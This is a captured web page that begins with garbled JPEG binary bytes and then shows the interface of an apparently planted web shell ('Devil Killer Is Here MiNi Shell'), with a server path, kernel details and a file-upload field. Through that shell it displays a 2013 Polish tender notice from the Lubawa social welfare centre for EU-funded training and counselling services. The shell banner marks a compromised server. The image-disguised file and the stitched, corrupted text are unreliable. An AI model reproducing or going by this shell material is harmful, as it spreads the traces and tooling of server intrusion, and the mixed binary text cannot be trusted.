JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130206/19585-N-2013.html

<p class="kh_header"><b>Lubawa: ORGANIZACJA  I  PRZEPROWADZENIE  USŁUG  EDUKACYJNYCH  I SZKOLENIOWYCH W DZIEDZINIE ROZWOJU OSOBISTEGO dla uczestników projektu PN. AKTYWNA RODZINA realizowanego w 2013r.</b><br>
<b>Numer ogłoszenia: 19585 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Gminy Lubawa , Fijewo 73, 14-260 Lubawa, woj. warmińsko-mazurskie, tel. 0-89 6455439, faks 0-89 6455439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopslubawa.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA  I  PRZEPROWADZENIE  USŁUG  EDUKACYJNYCH  I SZKOLENIOWYCH W DZIEDZINIE ROZWOJU OSOBISTEGO dla uczestników projektu PN. AKTYWNA RODZINA realizowanego w 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOTEM ZAMÓWIENIA jest:
Organizacja i przeprowadzenie usług edukacyjnych  i szkoleniowych  w dziedzinie rozwoju osobistego w ramach projektu systemowego  pn. Aktywna rodzina Ośrodka Pomocy Społecznej Gminy Lubawa realizowanego w 2013r. współfinansowanego ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji  społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego  Funduszu Społecznego - dla dwóch grup Beneficjentów Ostatecznych projektu:
Grupy I  - 10 osób (Kobiet BO projektu w ramach kontraktów socjalnych)
Grupy II - 9 osób (5 Kobiet i 4 Mężczyzn; BO projektu w ramach kontraktów socjalnych).
PRZEDMIOT ZAMÓWIENIA został podzielony na 4 części zamówienia, z których każda stanowi odrębną część i może być przedmiotem oferty częściowej
CZĘŚĆ  1
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO    obejmująca
Trening interpersonalny (grupowy) - dla uczestniczek projektu  z Grupy I (10 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: MARZEC - MAJ 2013r.
Trening interpersonalny (grupowy) - dla uczestniczek i uczestników projektu          z Grupy II  (9 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: MARZEC - MAJ 2013r.
Poradnictwo psychologiczne (indywidualne) - dla uczestniczek projektu  z Grupy I  (10 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. - 50 godz. grupa, a 5 godz. osoba (6 godz. m-nie w miesiącach MARZEC - LIPIEC 2013r. oraz 5 godz. m-nie w miesiącach: SIERPIEŃ - LISTOPAD 2013r.)
Okres realizacji: MARZEC - LISTOPAD 2013r.
CZĘŚĆ 2
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO  obejmująca
Trening kompetencji rodzicielskich (grupowy)  dla uczestników i uczestniczek z Grupy I (10 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: MAJ  - LIPIEC 2013r.
Warsztaty zarządzania budżetem domowym (grupowe) dla uczestników i uczestniczek projektu z Grupy I (10 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: LIPIEC - WRZESIEŃ 2013r.
CZĘŚĆ 3
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Warsztaty aktywizacji zawodowej (grupowe) dla uczestników i uczestniczek z Grupy I (10 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: WRZESIEŃ  - LISTOPAD 2013r.
Warsztaty aktywizacji zawodowej (grupowe) dla uczestników i uczestniczek         z Grupy II   (9 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: WRZESIEŃ  - LISTOPAD 2013r.
Doradztwo zawodowe (indywidualne) - dla uczestników i uczestniczek z Grupy II    (9 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 36 godz. grupa, a 4 godz. osoba (4 godz.m-nie w miesiącach: MARZEC - LISTOPAD 2013r.);
Okres realizacji: MARZEC - LISTOPAD 2013r.;
CZĘŚĆ 4
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO  -  obejmująca
Warsztaty autoprezentacji (grupowe) - dla uczestników i uczestniczek z Grupy II  (9 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji: CZERWIEC - SIERPIEŃ 2013r.

ZAKRES PRZEDMIOTU ZAMÓWIENIA (usługi)

CZĘŚĆ 1: USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO    
TRENING  INTERPERSONALNY (grupowy) - w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Treningu interpersonalnego               dla uczestników projektu z
Grupy I - 10 osób
Grupy II - 9 osób
zgodnie z ustalonym programem i  harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania, które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy: 
rozwijanie kompetencji interpersonalnych, umiejętności współdziałania z ludźmi
doskonalenie umiejętności zachowania się w trudnych i konfliktowych sytuacjach,
nabycie umiejętności radzenia sobie w trudnych sytuacjach z negatywnymi emocjami
wzmocnienie poczucia własnej wartości,
rozwijanie asertywności w relacjach interpersonalnych (reagowanie na  krytykę i zastrzeżenia, umiejętność odmawiania, wydawania poleceń stawiania granic i egzekwowania wymagań umiejętność wyrażania opinii
doskonalenie umiejętności wychowawczych
psychologiczny aspekt rozwoju dziecka świadomość własnych celów wychowawczych
rodzina jako środowisko opiekuńcze i wychowawcze
kształtowanie odpowiedniej  postawy społecznej i życiowej
obowiązki  i role w życiu
budowanie właściwej hierarchii potrzeb
umiejętność budowania harmonogramu działań
budowanie  motywacji i aspiracji społecznych i zawodowych
budowanie wiary we własne możliwości
przełamywanie poczucia bezradności
wprowadzenie do problematyki równości szans kobiet i mężczyzn
budowanie odpowiedzialności i obowiązkowości.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa
systematycznej oceny postępów uczestników szkolenia
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłatyza szkolenie tych osób
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi
sporządzenia Raportu ze zrealizowanego treningu i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.
PORADNICTWO  PSYCHOLOGICZNE (indywidualne) - w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Poradnictwa psychologicznego dla uczestniczek projektu z:Grupy  I - 10 osób,zgodnie z ustalonym harmonogramem.
Do głównego obowiązku należeć będzie prowadzenie poradnictwa specjalistycznego, konsultacji i wsparcia  wg. indywidualnych potrzeb osób objętych projektem.
Wykonawca będzie zobowiązany do:
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa
bieżącego informowania Zamawiającego o:
wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa w poradnictwie,
rezygnacji uczestnika z udziału w formie wsparcia, pod rygorem odmowy zapłaty      za poradnictwo,
przeprowadzenia ankiet po zakończeniu poradnictwa w celu zbadania jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego poradnictwa i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.

CZĘŚĆ 2: USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO:     
TRENING KOMPETENCJI RODZICIELSKICH (grupowy) w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Treningu kompetencji rodzicielskich   dla uczestniczek projektu z:Grupy  I - 10 osób,zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania, które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy: 
poprawa komunikacji pomiędzy dziećmi i rodzicami,
wytworzenie relacji współpracy z dzieckiem w realizacji obowiązków,
poznanie skutecznych metod dyscyplinowania bez urażania godności dziecka i rodzica,
ćwiczenie zachowań zachęcających dziecko do samodzielności,
budowanie pozytywnego i realistyczne wyobrażenia dzieci o sobie - umiejętne  stosowanie pochwał
poznanie koncepcji ról przybieranych przez dzieci i sposobów zapobiegania,
nauka wyznaczania zasad i przywilejów w rodzinie,
nauka poprawnej komunikacji (komunikat typu Ja),
uświadomienie, że konflikt może być pozytywny,
odbudowa i wzmacnianie więzi w rodzinie,
uświadomienie, że poprzez zmianę siebie możliwa jest poprawa relacji,
Wykonawca będzie zobowiązany do:
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o :
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego treningu i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.
WARSZTATY ZARZĄDZANIA BUDŻETEM DOMOWYM (grupowe) w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Warsztatów zarządzania budżetem domowym dla uczestniczek projektu z: Grupy  I - 10 osób, zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania, które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy: 
podstawowe zagadnienia ekonomiczne,
definiowanie posiadanych zasobów,
stawianie celów,
planowe i celowe zarządzanie budżetem,
oszczędzanie bez wyrzeczeń,
przykładowy budżet domowy,
indywidualne budżety domowe, techniki zarządzania,
planować domowy budżet i konsekwentnie go realizować,
poprawić swoją sytuację finansową i skutecznie oszczędzać,
radzić sobie w trudnych sytuacjach finansowych,
rozmawiać z dziećmi o pieniądzach.
Wykonawca będzie zobowiązany do:
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o :
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego warsztatu i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.

CZĘŚĆ 3: USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEG:     
WARSZTATY AKTYWIZACJI ZAWODOWEJ (grupowe) w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Warsztatów aktywizacji zawodowej  dla uczestników projektu z:
Grupy  I - 10 osób,
Grupy II - 9 osób,
zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania, które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien obejmować, m. in.:
rozpoznanie trudności w znalezieniu pracy,
informacja o zawodach, etap motywacji w podjęciu aktywności zawodowej,
określenie własnego potencjału,
analiza rynku pracy, przygotowanie się do podjęcia lub złożenia oferty pracy,
poznanie zasad sporządzania dokumentów aplikacyjnych i metod szukania pracy,
przygotowanie prezentacji własnej kandydatury przyszłemu pracodawcy,
przygotowanie do rozmowy kwalifikacyjnej,
najczęstsze błędy podczas rozmowy kwalifikacyjnej,
negocjowanie warunków pracy i płacy,
cechy przedsiębiorczego pracownika.
Wykonawca będzie zobowiązany do:
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o :
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanych warsztatów i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.
DORADZTWO ZAWODOWE (indywidualne)  w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Doradztwa zawodowego  dla uczestników projektu z:Grupy  II - 9 osób,zgodnie z ustalonym harmonogramem.
Program powinien w szczególności zawierać następujące elementy: 
analiza potencjału osobowościowego i zawodowego uczestników i uczestniczek projektu, 
określenie preferencji zawodowych, 
analiza rynku pracy, 
opracowanie dla każdego uczestnika  i uczestniczki projektu IPD.
Wykonawca będzie zobowiązany do:
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
bieżącego informowania Zamawiającego o :
wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa w doradztwie,
rezygnacji uczestnika z udziału w formie wsparcia, pod rygorem odmowy zapłaty za doradztwo,
przeprowadzenia ankiet po zakończeniu doradztwa w celu zbadania jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego doradztwa i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.

CZĘŚĆ 4: USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO:     
WARSZTATY AUTOPREZENTACJI (grupowe) -  w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Warsztatów autoprezentacji dla uczestników projektu z:Grupy  II - 9 osób, zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania, które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien obejmować, m. in.:
poznania siebie i tego, jak chcemy pokazać się innym,
poznanie technik skutecznego komunikowania się z innymi,
odnalezienia najlepszego sposobu na to, żeby być odbieranym zgodnie z naszymi intencjami,
radzenie sobie z lękiem przed wystąpieniami, spotkaniem z pracodawcą,
gesty w kontaktach z innymi ludźmi,
dobre pierwsze wrażenie - powitanie, przedstawianie, wizytówki, 
komunikacja - korespondencja, telefon, e-mail,
komunikacja werbalna i niewerbalna,
prezencja - wygląd zewnętrzny
rozmowa kwalifikacyjna,
spotkania - organizacja i przebieg,
Savoir-vivre na co dzień.
Wykonawca będzie zobowiązany do:
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o:
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanych warsztatów i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  Klub Integracji Społecznej w Mortęgach.

WYMAGANIA  W  ZAKRESIE  REALIZACJI PRZEDMIOTU ZAMÓWIENIA (usługi):
Miejsce realizacji warsztatów, treningów, poradnictwa, doradztwa:
Klub Integracji Społecznej w Mortęgach (mieszczący się w Świetlicy Wiejskiej w Mortęgach). Pomieszczenia udostępnione Wykonawcom nieodpłatnie.
Inne wymagania względem realizacji  przedmiotu zamówienia:
Wykonawca jest zobowiązany do dbania o należyty stan pomieszczeń oddanych do korzystania na cele związane z realizacją usługi edukacyjnej i szkoleniowej              (w czasie zajęć i po ich zakończeniu),
Za wszelkie szkody powstałe w pomieszczeniu oddanych Wykonawcy do realizacji usługi szkoleniowej odpowiada Wykonawca, który zobowiązany jest do bezzwłocznego naprawienia ich we własnym zakresie.
Wykonawca podczas realizacji zajęć, warsztatów, treningów itp. jest zobowiązany do zagwarantowania uczestnikom szkolenia:
cateringu w postaci: napoje (woda, herbata, kawa, soki, ciastka itp.) - dotyczy zajęć grupowych (warsztatów aktywizacji zawodowej, treningu interpersonalnego, warsztatów kompetencji rodzicielskich, warsztatów autoprezentacji, warsztatów zarządzania budżetem domowym),
obiadu (II danie wraz z napojem) - dotyczy zajęć grupowych, o których mowa w lit. a,
materiałów szkoleniowych oznakowanych w logotypy UE, POKL, EFS - dotyczy wszystkich form wsparcia dla Beneficjentów Ostatecznych (zajęć grupowych i indywidualnych),
sprzętu i materiałów niezbędnych do należytej realizacji przedmiotu zamówienia - dotyczy wszystkich form wsparcia dla Beneficjentów Ostatecznych (zajęć grupowych i indywidualnych).
Wykonawca jest zobowiązany do oznaczenia pomieszczeń, w których realizowane są usługi oraz materiały szkoleniowe zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach POKL zamieszczanymi na stronie internetowej: www.efs.gov.pl  lub www.mrr.gov.pl  lub  www.funduszestrukturalne.gov.pl..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy: 
Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia i wykażą że: 
w okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przeprowadzili co najmniej 2 szkolenia usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach poszczególnych części zamówienia dla klientów  pomocy społecznej (Miejskich Ośrodków Pomocy Społecznej, Gminnych Ośrodków Pomocy Społecznej, Powiatowych Centrów Pomocy Społecznej) -  tj.
CZĘŚĆ 1: 
co najmniej 2 usługi z zakresu Warsztatów lub treningu interpersonalnego lub Warsztatów lub treningu kompetencji i umiejętności społecznych  i co najmniej 2 usługi  z zakresu Poradnictwa psychologicznego, 
CZĘŚĆ 2: 
co najmniej 2 usługi z zakresu Treningu lub warsztatów kompetencji rodzicielskich lub innych zajęć w ramach których były prowadzone zajęcia z zakresu kompetencji rodzicielskich i 2 usługi z zakresu Treningu lub warsztatów zarządzania budżetem domowym lub innych zajęć w ramach których były prowadzone zajęcia z zakresu zarządzania budżetem domowym,
CZĘŚĆ 3: 
co najmniej 2 usługi z zakresu Warsztatów aktywizacji zawodowej i 2 usługi z zakresu Poradnictwa lub doradztwa zawodowego - wraz z opracowaniem IPD,
CZĘŚĆ 4:
co najmniej 2 usługi z zakresu Warsztatów treningu autoprezentacji lub innych zajęć  w ramach których były realizowane zajęcia z zakresu autoprezentacji.
dysponują osobami które posiadają wykształcenie niezbędne do realizacji poszczególnych: warsztatów, treningów, poradnictwa, doradztwa,
w ramach części przedmiotu zamówienia oraz doświadczenie zawodowe, tj.:przeprowadzili co najmniej  2 usługi (warsztaty, treningi, poradnictwa, doradztwa) odpowiadające  swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach poszczególnych części zamówienia.
Wykładowcy trenerzy biorący udział w realizacji zamówienia muszą posiadać wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych warsztatów, treningów, porad lub wykształcenie wyższe i specjalizację kierunkową lub inne  uprawniające do prowadzenia ww warsztatów, treningów, konsultacji i porad. 
Znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia. 
Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Pzp. 
